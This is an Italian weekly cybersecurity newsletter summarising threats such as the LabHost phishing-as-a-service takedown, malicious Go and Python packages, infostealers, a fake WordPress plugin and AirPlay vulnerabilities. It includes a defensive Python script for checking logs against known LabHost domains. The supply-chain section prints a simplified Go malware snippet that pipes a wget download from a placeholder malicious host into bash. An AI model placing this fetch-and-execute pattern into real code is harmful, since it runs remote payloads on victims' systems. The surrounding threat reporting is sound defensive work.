Security Weekly 28-2/5/25

I 42.000 domini Phishing as-a-service di LabHost analizzati: hai verificato che la tua rete non abbia avuto contatti con uno di loro? Script Python.

mag 03, 2025

Buon sabato e ben ritrovato caro cyber User!

📬 Ben ritrovati con il nostro aggiornamento settimanale sulle principali minacce, operazioni e campagne malevole osservate a livello globale. Questa settimana, l’ecosistema delle minacce ci restituisce un quadro sempre più articolato tra phishing-as-a-service, supply chain compromesse e nuove famiglie malware dotate di capacità evasive avanzate.

🚨 LabHost e JokerOTP: phishing industrializzato e OTP bypass

Due operazioni coordinate dalle forze dell’ordine (tra cui FBI, Europol e Polizia olandese) hanno smantellato:

LabHost: un servizio di phishing-as-a-service usato da oltre 10.000 criminali per distribuire più di 42.000 domini malevoli, rubando 500.000 carte di credito e oltre 1 milione di credenziali.
JokerOTP: strumento progettato per bypassare 2FA tramite phishing mirato, impersonando banche e exchange. Almeno 28.000 attacchi in 13 paesi, danni stimati: £7,5 milioni.

🔎 Cosa fare:

Integrare i domini pubblicati nel threat intelligence feed locale.
Cercare traffico anomalo verso domini C2, anche storicamente (retro hunting).

Ecco uno script Python che consente di controllare se la tua rete ha avuto contatti con uno dei 42.000 domini legati all'infrastruttura LabHost, pubblicati dall'FBI.

Lo script assume che tu abbia accesso ai log DNS o ai log proxy/firewall (in formato CSV o testo semplice), contenenti almeno un campo con i domini visitati.

🔍 Script: `check_labhost_domains.py`

import csv
import argparse

# Inserisci qui il percorso al file con i domini LabHost forniti dall'FBI
LABHOST_DOMAINS_FILE = 'labhost_domains.txt'

def load_labhost_domains(path):
    with open(path, 'r') as f:
        return set(line.strip().lower() for line in f if line.strip())

def check_logs_for_matches(log_file, domain_column=0, delimiter=','):
    labhost_domains = load_labhost_domains(LABHOST_DOMAINS_FILE)
    matches = []

    with open(log_file, 'r') as csvfile:
        reader = csv.reader(csvfile, delimiter=delimiter)
        for i, row in enumerate(reader):
            try:
                domain = row[domain_column].strip().lower()
                if domain in labhost_domains:
                    matches.append((i + 1, domain))
            except IndexError:
                continue

    return matches

def main():
    parser = argparse.ArgumentParser(description="Check network logs for LabHost domains")
    parser.add_argument("logfile", help="Path to your DNS/proxy log file (CSV or TXT)")
    parser.add_argument("--column", type=int, default=0, help="Column index with domains (default: 0)")
    parser.add_argument("--delimiter", default=',', help="CSV delimiter (default: ,)")
    args = parser.parse_args()

    print(f"🔍 Analizzando {args.logfile}...")
    matches = check_logs_for_matches(args.logfile, args.column, args.delimiter)

    if matches:
        print(f"⚠️ Trovati {len(matches)} domini sospetti:")
        for line_no, domain in matches:
            print(f"  - Riga {line_no}: {domain}")
    else:
        print("✅ Nessun dominio sospetto trovato.")

if __name__ == "__main__":
    main()

📁 Come usare lo script

Scarica il file con i domini LabHost
Se non l’hai già, ho riportato il link al CSV in alto prima dello script.
Prepara i tuoi log
Esporta i log DNS/Proxy in CSV o TXT. Assicurati che il file contenga un campo con i nomi di dominio (es: example.com).
Esegui lo script:

python3 check_labhost_domains.py my_dns_log.csv --column 1 --delimiter ','

Puoi modificare --column e --delimiter in base alla struttura dei tuoi log.

🔐 Note di sicurezza

Lo script non carica nulla online.
Si consiglia di usarlo in un ambiente forense o SOC isolato.
Può essere integrato con strumenti SIEM (es: import Elasticsearch o Splunk SDK per query automatiche).

🛑 Go e Python sotto attacco: supply chain compromessa

📦 Tre pacchetti Go malevoli contenevano payload disk-wiper offuscati, scaricabili via wget. Gli script bash erano progettati per sistemi Linux.

// Esempio di codice offuscato (semplificato)
func execPayload() {
  url := "http://malicious[.]domain/payload.sh"
  cmd := exec.Command("bash", "-c", "wget -qO- " + url + " | bash")
  cmd.Run()
}

📨 In parallelo, sette pacchetti Python con prefisso Coffin sfruttavano SMTP Gmail su porta 465 come canale C2, usando credenziali hardcoded.

🧩 Implicazioni:

Offuscamento + protocollo legittimo = alta evasività.
Meccanismi C2 su protocolli “trusted” (es. Gmail) eludono i proxy tradizionali.

👁️‍🗨️ Malware avanzati: GhostWeaver, Hannibal, Gremlin, TerraStealer

🧪 GhostWeaver via MintsLoader usa PowerShell + DGA + TLS per C2: diffuso con email di phishing in settori industriali e legali.

🔑 Hannibal Stealer (erede di Sharp/TX): esfiltra credenziali browser, wallet, FTP, VPN. Offre pannello di controllo Django e supporta sessioni Discord/Steam.

🧬 Gremlin Stealer: scritto in C#, aggira la protezione cookie di Chrome. Propagato via Telegram, destinato a mercati di infostealer "as-a-service".

🔐 Attacco alla sicurezza su WordPress: malware camuffato da plugin

Il falso plugin WP-antymalwary-bot.php:

Abilita RCE via REST API non autenticata.
Si autoconfigura in wp-cron.php per persistenza.
Inietta JS offuscati per monetizzazione via ads.

🛠️ Remediation tipica (CLI):

grep -r "register_rest_route" wp-content/plugins/
# controllare callback e autorizzazioni

📡 AirBorne: vulnerabilità zero-click su Apple AirPlay

CVE-2025-24252 (use-after-free)
CVE-2025-24132 (buffer overflow)

Attaccanti possono ottenere RCE su dispositivi Apple senza interazione utente. Impatti anche su SDK di terze parti.

🛠 Mitigazioni consigliate:

Patch immediate su dispositivi iOS/macOS.
Disattivare AirPlay quando non necessario.

🧠 APT & Initial Access Brokers (IAB)

ToyMaker vende accessi a gruppi ransomware (es. CACTUS) sfruttando malware proprietario LAGTOY, reverse shell + esecuzione comandi.
Earth Kasha (probabilmente APT10) ha attaccato enti giapponesi e taiwanesi usando ANEL e NOOPDOOR, con canali DNS-over-HTTPS.

🎣 Phishing socialmente rilevante

Attacchi su eventi reali: blackout in Spagna/Portogallo → finti rimborsi TAP.
Finti PDF dell’INPS USA → installazione client remoto ScreenConnect via .exe offuscato.

🧠 Considerazione: l’integrazione di feed CTI + attualità geopolitica è ormai imprescindibile per anticipare queste campagne.

📊 Tendenze osservate

😋 FunFact

Oggi un tool che può risultare molto interessante in caso di verifica di un APK Android prima di installarlo da terze parti sul nostro dispositivo.

Apepe è un progetto sviluppato per aiutare ad acquisire informazioni da un'app Android tramite il suo file APK.

Cosa può fare Apepe?

Elenca le attività, i permessi, i servizi e le librerie utilizzate dall'app
Identificare il linguaggio di sviluppo dell'app in base al nome delle classi
Suggerisci di bypassare i pinning SSL con il flag -l
Trova i deeplink nei file DEX, JSON e AndroidManifest.xml con il flag -d

Anche quest'oggi abbiamo concluso, ti ringrazio per il tempo e l'attenzione che mi hai dedicato, augurandoti buon fine settimana, ti rimando al mio blog e alla prossima settimana per un nuovo appuntamento con NINAsec.

Il network

Con questo piccolo schema riepilogo in breve i punti di riferimento che alimento con i miei contenuti, su diversi fronti, quasi quotidianamente.

Ransomfeed.it - piattaforma di monitoraggio ransomware, realtime;
inSicurezzaDigitale.com - blog di sicurezza informatica con approfondimenti tematici;
SecureBulletin.com - news internazionali su cyber security, analisi e frodi;
Spcnet.it - notizie geek;
ilGlobale.it - note politiche e di economia, di rilevanza internazionale;
Ziobudda.org - notizie Linux, open source e software libero, segnalabili e commentabili (socialnews).
NewsDF - il raccoglitore di tutto questo, con un suo feed RSS generale, per non perdere niente di quello che pubblico.

NINAsec